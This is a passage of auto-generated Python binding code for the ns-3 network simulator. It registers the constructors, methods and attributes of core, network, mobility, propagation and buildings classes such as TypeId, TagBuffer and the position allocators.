'tid')]) return def register_Ns3SimpleRefCount__Ns3Object_Ns3ObjectBase_Ns3ObjectDeleter_methods(root_module, cls): ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter>::SimpleRefCount() [constructor] cls.add_constructor([]) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter>::SimpleRefCount(ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter> const & o) [copy constructor] cls.add_constructor([param('ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter > const &', 'o')]) ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter>::Cleanup() [member function] cls.add_method('Cleanup', 'void', [], is_static=True) return def register_Ns3TagBuffer_methods(root_module, cls): ## tag-buffer.h (module 'network'): ns3::TagBuffer::TagBuffer(ns3::TagBuffer const & arg0) [copy constructor] cls.add_constructor([param('ns3::TagBuffer const &', 'arg0')]) ## tag-buffer.h (module 'network'): ns3::TagBuffer::TagBuffer(uint8_t * start, uint8_t * end) [constructor] cls.add_constructor([param('uint8_t *', 'start'), param('uint8_t *', 'end')]) ## tag-buffer.h (module 'network'): void ns3::TagBuffer::CopyFrom(ns3::TagBuffer o) [member function] cls.add_method('CopyFrom', 'void', [param('ns3::TagBuffer', 'o')]) ## tag-buffer.h (module 'network'): void ns3::TagBuffer::Read(uint8_t * buffer, uint32_t size) [member function] cls.add_method('Read', 'void', [param('uint8_t *', 'buffer'), param('uint32_t', 'size')]) ## tag-buffer.h (module 'network'): double ns3::TagBuffer::ReadDouble() [member function] cls.add_method('ReadDouble', 'double', []) ## tag-buffer.h (module 'network'): uint16_t ns3::TagBuffer::ReadU16() [member function] cls.add_method('ReadU16', 'uint16_t', []) ## tag-buffer.h (module 'network'): uint32_t ns3::TagBuffer::ReadU32() [member function] cls.add_method('ReadU32', 'uint32_t', []) ## tag-buffer.h (module 'network'): uint64_t ns3::TagBuffer::ReadU64() [member function] cls.add_method('ReadU64', 'uint64_t', []) ## tag-buffer.h (module 'network'): uint8_t ns3::TagBuffer::ReadU8() [member function] cls.add_method('ReadU8', 'uint8_t', []) ## tag-buffer.h (module 'network'): void ns3::TagBuffer::TrimAtEnd(uint32_t trim) [member function] cls.add_method('TrimAtEnd', 'void', [param('uint32_t', 'trim')]) ## tag-buffer.h (module 'network'): void ns3::TagBuffer::Write(uint8_t const * buffer, uint32_t size) [member function] cls.add_method('Write', 'void', [param('uint8_t const *', 'buffer'), param('uint32_t', 'size')]) ## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteDouble(double v) [member function] cls.add_method('WriteDouble', 'void', [param('double', 'v')]) ## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteU16(uint16_t data) [member function] cls.add_method('WriteU16', 'void', [param('uint16_t', 'data')]) ## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteU32(uint32_t data) [member function] cls.add_method('WriteU32', 'void', [param('uint32_t', 'data')]) ## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteU64(uint64_t v) [member function] cls.add_method('WriteU64', 'void', [param('uint64_t', 'v')]) ## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteU8(uint8_t v) [member function] cls.add_method('WriteU8', 'void', [param('uint8_t', 'v')]) return def register_Ns3TimeWithUnit_methods(root_module, cls): cls.add_output_stream_operator() ## nstime.h (module 'core'): ns3::TimeWithUnit::TimeWithUnit(ns3::TimeWithUnit const & arg0) [copy constructor] cls.add_constructor([param('ns3::TimeWithUnit const &', 'arg0')]) ## nstime.h (module 'core'): ns3::TimeWithUnit::TimeWithUnit(ns3::Time const time, ns3::Time::Unit const unit) [constructor] cls.add_constructor([param('ns3::Time const', 'time'), param('ns3::Time::Unit const', 'unit')]) return def register_Ns3TypeId_methods(root_module, cls): cls.add_binary_comparison_operator('<') cls.add_binary_comparison_operator('!=') cls.add_output_stream_operator() cls.add_binary_comparison_operator('==') ## type-id.h (module 'core'): ns3::TypeId::TypeId(char const * name) [constructor] cls.add_constructor([param('char const *', 'name')]) ## type-id.h (module 'core'): ns3::TypeId::TypeId() [constructor] cls.add_constructor([]) ## type-id.h (module 'core'): ns3::TypeId::TypeId(ns3::TypeId const & o) [copy constructor] cls.add_constructor([param('ns3::TypeId const &', 'o')]) ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddAttribute(std::string name, std::string help, ns3::AttributeValue const & initialValue, ns3::Ptr<ns3::AttributeAccessor const> accessor, ns3::Ptr<ns3::AttributeChecker const> checker, ns3::TypeId::SupportLevel supportLevel=::ns3::TypeId::SUPPORTED, std::string const & supportMsg="") [member function] cls.add_method('AddAttribute', 'ns3::TypeId', [param('std::string', 'name'), param('std::string', 'help'), param('ns3::AttributeValue const &', 'initialValue'), param('ns3::Ptr< ns3::AttributeAccessor const >', 'accessor'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker'), param('ns3::TypeId::SupportLevel', 'supportLevel', default_value='::ns3::TypeId::SUPPORTED'), param('std::string const &', 'supportMsg', default_value='""')]) ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddAttribute(std::string name, std::string help, uint32_t flags, ns3::AttributeValue const & initialValue, ns3::Ptr<ns3::AttributeAccessor const> accessor, ns3::Ptr<ns3::AttributeChecker const> checker, ns3::TypeId::SupportLevel supportLevel=::ns3::TypeId::SUPPORTED, std::string const & supportMsg="") [member function] cls.add_method('AddAttribute', 'ns3::TypeId', [param('std::string', 'name'), param('std::string', 'help'), param('uint32_t', 'flags'), param('ns3::AttributeValue const &', 'initialValue'), param('ns3::Ptr< ns3::AttributeAccessor const >', 'accessor'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker'), param('ns3::TypeId::SupportLevel', 'supportLevel', default_value='::ns3::TypeId::SUPPORTED'), param('std::string const &', 'supportMsg', default_value='""')]) ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddTraceSource(std::string name, std::string help, ns3::Ptr<ns3::TraceSourceAccessor const> accessor) [member function] cls.add_method('AddTraceSource', 'ns3::TypeId', [param('std::string', 'name'), param('std::string', 'help'), param('ns3::Ptr< ns3::TraceSourceAccessor const >', 'accessor')], deprecated=True) ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddTraceSource(std::string name, std::string help, ns3::Ptr<ns3::TraceSourceAccessor const> accessor, std::string callback, ns3::TypeId::SupportLevel supportLevel=::ns3::TypeId::SUPPORTED, std::string const & supportMsg="") [member function] cls.add_method('AddTraceSource', 'ns3::TypeId', [param('std::string', 'name'), param('std::string', 'help'), param('ns3::Ptr< ns3::TraceSourceAccessor const >', 'accessor'), param('std::string', 'callback'), param('ns3::TypeId::SupportLevel', 'supportLevel', default_value='::ns3::TypeId::SUPPORTED'), param('std::string const &', 'supportMsg', default_value='""')]) ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation ns3::TypeId::GetAttribute(uint32_t i) const [member function] cls.add_method('GetAttribute', 'ns3::TypeId::AttributeInformation', [param('uint32_t', 'i')], is_const=True) ## type-id.h (module 'core'): std::string ns3::TypeId::GetAttributeFullName(uint32_t i) const [member function] cls.add_method('GetAttributeFullName', 'std::string', [param('uint32_t', 'i')], is_const=True) ## type-id.h (module 'core'): uint32_t ns3::TypeId::GetAttributeN() const [member function] cls.add_method('GetAttributeN', 'uint32_t', [], is_const=True) ## type-id.h (module 'core'): ns3::Callback<ns3::ObjectBase*,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> ns3::TypeId::GetConstructor() const [member function] cls.add_method('GetConstructor', 'ns3::Callback< ns3::ObjectBase *, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', [], is_const=True) ## type-id.h (module 'core'): std::string ns3::TypeId::GetGroupName() const [member function] cls.add_method('GetGroupName', 'std::string', [], is_const=True) ## type-id.h (module 'core'): uint32_t ns3::TypeId::GetHash() const [member function] cls.add_method('GetHash', 'uint32_t', [], is_const=True) ## type-id.h (module 'core'): std::string ns3::TypeId::GetName() const [member function] cls.add_method('GetName', 'std::string', [], is_const=True) ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::GetParent() const [member function] cls.add_method('GetParent', 'ns3::TypeId', [], is_const=True) ## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::GetRegistered(uint32_t i) [member function] cls.add_method('GetRegistered', 'ns3::TypeId', [param('uint32_t', 'i')], is_static=True) ## type-id.h (module 'core'): static uint32_t ns3::TypeId::GetRegisteredN() [member function] cls.add_method('GetRegisteredN', 'uint32_t', [], is_static=True) ## type-id.h (module 'core'): std::size_t ns3::TypeId::GetSize() const [member function] cls.add_method('GetSize', 'std::size_t', [], is_const=True) ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation ns3::TypeId::GetTraceSource(uint32_t i) const [member function] cls.add_method('GetTraceSource', 'ns3::TypeId::TraceSourceInformation', [param('uint32_t', 'i')], is_const=True) ## type-id.h (module 'core'): uint32_t ns3::TypeId::GetTraceSourceN() const [member function] cls.add_method('GetTraceSourceN', 'uint32_t', [], is_const=True) ## type-id.h (module 'core'): uint16_t ns3::TypeId::GetUid() const [member function] cls.add_method('GetUid', 'uint16_t', [], is_const=True) ## type-id.h (module 'core'): bool ns3::TypeId::HasConstructor() const [member function] cls.add_method('HasConstructor', 'bool', [], is_const=True) ## type-id.h (module 'core'): bool ns3::TypeId::HasParent() const [member function] cls.add_method('HasParent', 'bool', [], is_const=True) ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::HideFromDocumentation() [member function] cls.add_method('HideFromDocumentation', 'ns3::TypeId', []) ## type-id.h (module 'core'): bool ns3::TypeId::IsChildOf(ns3::TypeId other) const [member function] cls.add_method('IsChildOf', 'bool', [param('ns3::TypeId', 'other')], is_const=True) ## type-id.h (module 'core'): bool ns3::TypeId::LookupAttributeByName(std::string name, ns3::TypeId::AttributeInformation * info) const [member function] cls.add_method('LookupAttributeByName', 'bool', [param('std::string', 'name'), param('ns3::TypeId::AttributeInformation *', 'info', transfer_ownership=False)], is_const=True) ## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::LookupByHash(uint32_t hash) [member function] cls.add_method('LookupByHash', 'ns3::TypeId', [param('uint32_t', 'hash')], is_static=True) ## type-id.h (module 'core'): static bool ns3::TypeId::LookupByHashFailSafe(uint32_t hash, ns3::TypeId * tid) [member function] cls.add_method('LookupByHashFailSafe', 'bool', [param('uint32_t', 'hash'), param('ns3::TypeId *', 'tid')], is_static=True) ## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::LookupByName(std::string name) [member function] cls.add_method('LookupByName', 'ns3::TypeId', [param('std::string', 'name')], is_static=True) ## type-id.h (module 'core'): ns3::Ptr<ns3::TraceSourceAccessor const> ns3::TypeId::LookupTraceSourceByName(std::string name) const [member function] cls.add_method('LookupTraceSourceByName', 'ns3::Ptr< ns3::TraceSourceAccessor const >', [param('std::string', 'name')], is_const=True) ## type-id.h (module 'core'): ns3::Ptr<ns3::TraceSourceAccessor const> ns3::TypeId::LookupTraceSourceByName(std::string name, ns3::TypeId::TraceSourceInformation * info) const [member function] cls.add_method('LookupTraceSourceByName', 'ns3::Ptr< ns3::TraceSourceAccessor const >', [param('std::string', 'name'), param('ns3::TypeId::TraceSourceInformation *', 'info')], is_const=True) ## type-id.h (module 'core'): bool ns3::TypeId::MustHideFromDocumentation() const [member function] cls.add_method('MustHideFromDocumentation', 'bool', [], is_const=True) ## type-id.h (module 'core'): bool ns3::TypeId::SetAttributeInitialValue(uint32_t i, ns3::Ptr<ns3::AttributeValue const> initialValue) [member function] cls.add_method('SetAttributeInitialValue', 'bool', [param('uint32_t', 'i'), param('ns3::Ptr< ns3::AttributeValue const >', 'initialValue')]) ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::SetGroupName(std::string groupName) [member function] cls.add_method('SetGroupName', 'ns3::TypeId', [param('std::string', 'groupName')]) ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::SetParent(ns3::TypeId tid) [member function] cls.add_method('SetParent', 'ns3::TypeId', [param('ns3::TypeId', 'tid')]) ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::SetSize(std::size_t size) [member function] cls.add_method('SetSize', 'ns3::TypeId', [param('std::size_t', 'size')]) ## type-id.h (module 'core'): void ns3::TypeId::SetUid(uint16_t uid) [member function] cls.add_method('SetUid', 'void', [param('uint16_t', 'uid')]) return def register_Ns3TypeIdAttributeInformation_methods(root_module, cls): ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::AttributeInformation() [constructor] cls.add_constructor([]) ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::AttributeInformation(ns3::TypeId::AttributeInformation const & arg0) [copy constructor] cls.add_constructor([param('ns3::TypeId::AttributeInformation const &', 'arg0')]) ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::accessor [variable] cls.add_instance_attribute('accessor', 'ns3::Ptr< ns3::AttributeAccessor const >', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::checker [variable] cls.add_instance_attribute('checker', 'ns3::Ptr< ns3::AttributeChecker const >', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::flags [variable] cls.add_instance_attribute('flags', 'uint32_t', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::help [variable] cls.add_instance_attribute('help', 'std::string', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::initialValue [variable] cls.add_instance_attribute('initialValue', 'ns3::Ptr< ns3::AttributeValue const >', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::name [variable] cls.add_instance_attribute('name', 'std::string', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::originalInitialValue [variable] cls.add_instance_attribute('originalInitialValue', 'ns3::Ptr< ns3::AttributeValue const >', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::supportLevel [variable] cls.add_instance_attribute('supportLevel', 'ns3::TypeId::SupportLevel', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::supportMsg [variable] cls.add_instance_attribute('supportMsg', 'std::string', is_const=False) return def register_Ns3TypeIdTraceSourceInformation_methods(root_module, cls): ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::TraceSourceInformation() [constructor] cls.add_constructor([]) ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::TraceSourceInformation(ns3::TypeId::TraceSourceInformation const & arg0) [copy constructor] cls.add_constructor([param('ns3::TypeId::TraceSourceInformation const &', 'arg0')]) ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::accessor [variable] cls.add_instance_attribute('accessor', 'ns3::Ptr< ns3::TraceSourceAccessor const >', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::callback [variable] cls.add_instance_attribute('callback', 'std::string', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::help [variable] cls.add_instance_attribute('help', 'std::string', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::name [variable] cls.add_instance_attribute('name', 'std::string', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::supportLevel [variable] cls.add_instance_attribute('supportLevel', 'ns3::TypeId::SupportLevel', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::supportMsg [variable] cls.add_instance_attribute('supportMsg', 'std::string', is_const=False) return def register_Ns3Vector2D_methods(root_module, cls): cls.add_output_stream_operator() ## vector.h (module 'core'): ns3::Vector2D::Vector2D(ns3::Vector2D const & arg0) [copy constructor] cls.add_constructor([param('ns3::Vector2D const &', 'arg0')]) ## vector.h (module 'core'): ns3::Vector2D::Vector2D(double _x, double _y) [constructor] cls.add_constructor([param('double', '_x'), param('double', '_y')]) ## vector.h (module 'core'): ns3::Vector2D::Vector2D() [constructor] cls.add_constructor([]) ## vector.h (module 'core'): ns3::Vector2D::x [variable] cls.add_instance_attribute('x', 'double', is_const=False) ## vector.h (module 'core'): ns3::Vector2D::y [variable] cls.add_instance_attribute('y', 'double', is_const=False) return def register_Ns3Vector3D_methods(root_module, cls): cls.add_output_stream_operator() ## vector.h (module 'core'): ns3::Vector3D::Vector3D(ns3::Vector3D const & arg0) [copy constructor] cls.add_constructor([param('ns3::Vector3D const &', 'arg0')]) ## vector.h (module 'core'): ns3::Vector3D::Vector3D(double _x, double _y, double _z) [constructor] cls.add_constructor([param('double', '_x'), param('double', '_y'), param('double', '_z')]) ## vector.h (module 'core'): ns3::Vector3D::Vector3D() [constructor] cls.add_constructor([]) ## vector.h (module 'core'): ns3::Vector3D::x [variable] cls.add_instance_attribute('x', 'double', is_const=False) ## vector.h (module 'core'): ns3::Vector3D::y [variable] cls.add_instance_attribute('y', 'double', is_const=False) ## vector.h (module 'core'): ns3::Vector3D::z [variable] cls.add_instance_attribute('z', 'double', is_const=False) return def register_Ns3Empty_methods(root_module, cls): ## empty.h (module 'core'): ns3::empty::empty() [constructor] cls.add_constructor([]) ## empty.h (module 'core'): ns3::empty::empty(ns3::empty const & arg0) [copy constructor] cls.add_constructor([param('ns3::empty const &', 'arg0')]) return def register_Ns3Int64x64_t_methods(root_module, cls): cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', u'right')) cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', u'right')) cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', u'right')) cls.add_unary_numeric_operator('-') cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', u'right')) cls.add_binary_comparison_operator('<') cls.add_binary_comparison_operator('>') cls.add_binary_comparison_operator('!=') cls.add_inplace_numeric_operator('*=', param('ns3::int64x64_t const &', u'right')) cls.add_inplace_numeric_operator('+=', param('ns3::int64x64_t const &', u'right')) cls.add_inplace_numeric_operator('-=', param('ns3::int64x64_t const &', u'right')) cls.add_inplace_numeric_operator('/=', param('ns3::int64x64_t const &', u'right')) cls.add_output_stream_operator() cls.add_binary_comparison_operator('<=') cls.add_binary_comparison_operator('==') cls.add_binary_comparison_operator('>=') ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t() [constructor] cls.add_constructor([]) ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(double v) [constructor] cls.add_constructor([param('double', 'v')]) ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long double v) [constructor] cls.add_constructor([param('long double', 'v')]) ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(int v) [constructor] cls.add_constructor([param('int', 'v')]) ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long int v) [constructor] cls.add_constructor([param('long int', 'v')]) ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long long int v) [constructor] cls.add_constructor([param('long long int', 'v')]) ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(unsigned int v) [constructor] cls.add_constructor([param('unsigned int', 'v')]) ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long unsigned int v) [constructor] cls.add_constructor([param('long unsigned int', 'v')]) ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long long unsigned int v) [constructor] cls.add_constructor([param('long long unsigned int', 'v')]) ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(int64_t hi, uint64_t lo) [constructor] cls.add_constructor([param('int64_t', 'hi'), param('uint64_t', 'lo')]) ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(ns3::int64x64_t const & o) [copy constructor] cls.add_constructor([param('ns3::int64x64_t const &', 'o')]) ## int64x64-double.h (module 'core'): double ns3::int64x64_t::GetDouble() const [member function] cls.add_method('GetDouble', 'double', [], is_const=True) ## int64x64-double.h (module 'core'): int64_t ns3::int64x64_t::GetHigh() const [member function] cls.add_method('GetHigh', 'int64_t', [], is_const=True) ## int64x64-double.h (module 'core'): uint64_t ns3::int64x64_t::GetLow() const [member function] cls.add_method('GetLow', 'uint64_t', [], is_const=True) ## int64x64-double.h (module 'core'): static ns3::int64x64_t ns3::int64x64_t::Invert(uint64_t v) [member function] cls.add_method('Invert', 'ns3::int64x64_t', [param('uint64_t', 'v')], is_static=True) ## int64x64-double.h (module 'core'): void ns3::int64x64_t::MulByInvert(ns3::int64x64_t const & o) [member function] cls.add_method('MulByInvert', 'void', [param('ns3::int64x64_t const &', 'o')]) ## int64x64-double.h (module 'core'): ns3::int64x64_t::implementation [variable] cls.add_static_attribute('implementation', 'ns3::int64x64_t::impl_type const', is_const=True) return def register_Ns3Object_methods(root_module, cls): ## object.h (module 'core'): ns3::Object::Object() [constructor] cls.add_constructor([]) ## object.h (module 'core'): void ns3::Object::AggregateObject(ns3::Ptr<ns3::Object> other) [member function] cls.add_method('AggregateObject', 'void', [param('ns3::Ptr< ns3::Object >', 'other')]) ## object.h (module 'core'): void ns3::Object::Dispose() [member function] cls.add_method('Dispose', 'void', []) ## object.h (module 'core'): ns3::Object::AggregateIterator ns3::Object::GetAggregateIterator() const [member function] cls.add_method('GetAggregateIterator', 'ns3::Object::AggregateIterator', [], is_const=True) ## object.h (module 'core'): ns3::TypeId ns3::Object::GetInstanceTypeId() const [member function] cls.add_method('GetInstanceTypeId', 'ns3::TypeId', [], is_const=True, is_virtual=True) ## object.h (module 'core'): static ns3::TypeId ns3::Object::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## object.h (module 'core'): void ns3::Object::Initialize() [member function] cls.add_method('Initialize', 'void', []) ## object.h (module 'core'): bool ns3::Object::IsInitialized() const [member function] cls.add_method('IsInitialized', 'bool', [], is_const=True) ## object.h (module 'core'): ns3::Object::Object(ns3::Object const & o) [copy constructor] cls.add_constructor([param('ns3::Object const &', 'o')], visibility='protected') ## object.h (module 'core'): void ns3::Object::DoDispose() [member function] cls.add_method('DoDispose', 'void', [], visibility='protected', is_virtual=True) ## object.h (module 'core'): void ns3::Object::DoInitialize() [member function] cls.add_method('DoInitialize', 'void', [], visibility='protected', is_virtual=True) ## object.h (module 'core'): void ns3::Object::NotifyNewAggregate() [member function] cls.add_method('NotifyNewAggregate', 'void', [], visibility='protected', is_virtual=True) return def register_Ns3ObjectAggregateIterator_methods(root_module, cls): ## object.h (module 'core'): ns3::Object::AggregateIterator::AggregateIterator(ns3::Object::AggregateIterator const & arg0) [copy constructor] cls.add_constructor([param('ns3::Object::AggregateIterator const &', 'arg0')]) ## object.h (module 'core'): ns3::Object::AggregateIterator::AggregateIterator() [constructor] cls.add_constructor([]) ## object.h (module 'core'): bool ns3::Object::AggregateIterator::HasNext() const [member function] cls.add_method('HasNext', 'bool', [], is_const=True) ## object.h (module 'core'): ns3::Ptr<ns3::Object const> ns3::Object::AggregateIterator::Next() [member function] cls.add_method('Next', 'ns3::Ptr< ns3::Object const >', []) return def register_Ns3PositionAllocator_methods(root_module, cls): ## position-allocator.h (module 'mobility'): ns3::PositionAllocator::PositionAllocator(ns3::PositionAllocator const & arg0) [copy constructor] cls.add_constructor([param('ns3::PositionAllocator const &', 'arg0')]) ## position-allocator.h (module 'mobility'): ns3::PositionAllocator::PositionAllocator() [constructor] cls.add_constructor([]) ## position-allocator.h (module 'mobility'): int64_t ns3::PositionAllocator::AssignStreams(int64_t stream) [member function] cls.add_method('AssignStreams', 'int64_t', [param('int64_t', 'stream')], is_pure_virtual=True, is_virtual=True) ## position-allocator.h (module 'mobility'): ns3::Vector ns3::PositionAllocator::GetNext() const [member function] cls.add_method('GetNext', 'ns3::Vector', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## position-allocator.h (module 'mobility'): static ns3::TypeId ns3::PositionAllocator::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) return def register_Ns3PropagationLossModel_methods(root_module, cls): ## propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::PropagationLossModel::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## propagation-loss-model.h (module 'propagation'): ns3::PropagationLossModel::PropagationLossModel() [constructor] cls.add_constructor([]) ## propagation-loss-model.h (module 'propagation'): void ns3::PropagationLossModel::SetNext(ns3::Ptr<ns3::PropagationLossModel> next) [member function] cls.add_method('SetNext', 'void', [param('ns3::Ptr< ns3::PropagationLossModel >', 'next')]) ## propagation-loss-model.h (module 'propagation'): ns3::Ptr<ns3::PropagationLossModel> ns3::PropagationLossModel::GetNext() [member function] cls.add_method('GetNext', 'ns3::Ptr< ns3::PropagationLossModel >', []) ## propagation-loss-model.h (module 'propagation'): double ns3::PropagationLossModel::CalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function] cls.add_method('CalcRxPower', 'double', [param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')], is_const=True) ## propagation-loss-model.h (module 'propagation'): int64_t ns3::PropagationLossModel::AssignStreams(int64_t stream) [member function] cls.add_method('AssignStreams', 'int64_t', [param('int64_t', 'stream')]) ## propagation-loss-model.h (module 'propagation'): double ns3::PropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function] cls.add_method('DoCalcRxPower', 'double', [param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')], is_pure_virtual=True, is_const=True, visibility='private', is_virtual=True) ## propagation-loss-model.h (module 'propagation'): int64_t ns3::PropagationLossModel::DoAssignStreams(int64_t stream) [member function] cls.add_method('DoAssignStreams', 'int64_t', [param('int64_t', 'stream')], is_pure_virtual=True, visibility='private', is_virtual=True) return def register_Ns3RandomBoxPositionAllocator_methods(root_module, cls): ## position-allocator.h (module 'mobility'): ns3::RandomBoxPositionAllocator::RandomBoxPositionAllocator(ns3::RandomBoxPositionAllocator const & arg0) [copy constructor] cls.add_constructor([param('ns3::RandomBoxPositionAllocator const &', 'arg0')]) ## position-allocator.h (module 'mobility'): ns3::RandomBoxPositionAllocator::RandomBoxPositionAllocator() [constructor] cls.add_constructor([]) ## position-allocator.h (module 'mobility'): int64_t ns3::RandomBoxPositionAllocator::AssignStreams(int64_t stream) [member function] cls.add_method('AssignStreams', 'int64_t', [param('int64_t', 'stream')], is_virtual=True) ## position-allocator.h (module 'mobility'): ns3::Vector ns3::RandomBoxPositionAllocator::GetNext() const [member function] cls.add_method('GetNext', 'ns3::Vector', [], is_const=True, is_virtual=True) ## position-allocator.h (module 'mobility'): static ns3::TypeId ns3::RandomBoxPositionAllocator::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## position-allocator.h (module 'mobility'): void ns3::RandomBoxPositionAllocator::SetX(ns3::Ptr<ns3::RandomVariableStream> x) [member function] cls.add_method('SetX', 'void', [param('ns3::Ptr< ns3::RandomVariableStream >', 'x')]) ## position-allocator.h (module 'mobility'): void ns3::RandomBoxPositionAllocator::SetY(ns3::Ptr<ns3::RandomVariableStream> y) [member function] cls.add_method('SetY', 'void', [param('ns3::Ptr< ns3::RandomVariableStream >', 'y')]) ## position-allocator.h (module 'mobility'): void ns3::RandomBoxPositionAllocator::SetZ(ns3::Ptr<ns3::RandomVariableStream> z) [member function] cls.add_method('SetZ', 'void', [param('ns3::Ptr< ns3::RandomVariableStream >', 'z')]) return def register_Ns3RandomBuildingPositionAllocator_methods(root_module, cls): ## building-position-allocator.h (module 'buildings'): ns3::RandomBuildingPositionAllocator::RandomBuildingPositionAllocator(ns3::RandomBuildingPositionAllocator const & arg0) [copy constructor] cls.add_constructor([param('ns3::RandomBuildingPositionAllocator const &', 'arg0')]) ## building-position-allocator.h (module 'buildings'): ns3::RandomBuildingPositionAllocator::RandomBuildingPositionAllocator() [constructor] cls.add_constructor([]) ## building-position-allocator.h (module 'buildings'): int64_t ns3::RandomBuildingPositionAllocator::AssignStreams(int64_t stream) [member function] cls.add_method('AssignStreams', 'int64_t', [param('int64_t', 'stream')], is_virtual=True) ## building-position-allocator.h (module 'buildings'): ns3::Vector ns3::RandomBuildingPositionAllocator::GetNext() const [member function] cls.add_method('GetNext', 'ns3::Vector', [], is_const=True, is_virtual=True) ## building-position-allocator.h (module 'buildings'): static ns3::TypeId ns3::RandomBuildingPositionAllocator::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) return def register_Ns3RandomDiscPositionAllocator_methods(root_module, cls): ## position-allocator.h (module 'mobility'): ns3::RandomDiscPositionAllocator::RandomDiscPositionAllocator(ns3::RandomDiscPositionAllocator const & arg0) [copy constructor] cls.add_constructor([param('ns3::RandomDiscPositionAllocator const &', 'arg0')]) ## position-allocator.h (module 'mobility'): ns3::RandomDiscPositionAllocator::RandomDiscPositionAllocator() [constructor] cls.add_constructor([]) ## position-allocator.h (module 'mobility'): int64_t ns3::RandomDiscPositionAllocator::AssignStreams(int64_t stream) [member function] cls.add_method('AssignStreams', 'int64_t', [param('int64_t', 'stream')], is_virtual=True) ## position-allocator.h (module 'mobility'): ns3::Vector ns3::RandomDiscPositionAllocator::GetNext() const [member function] 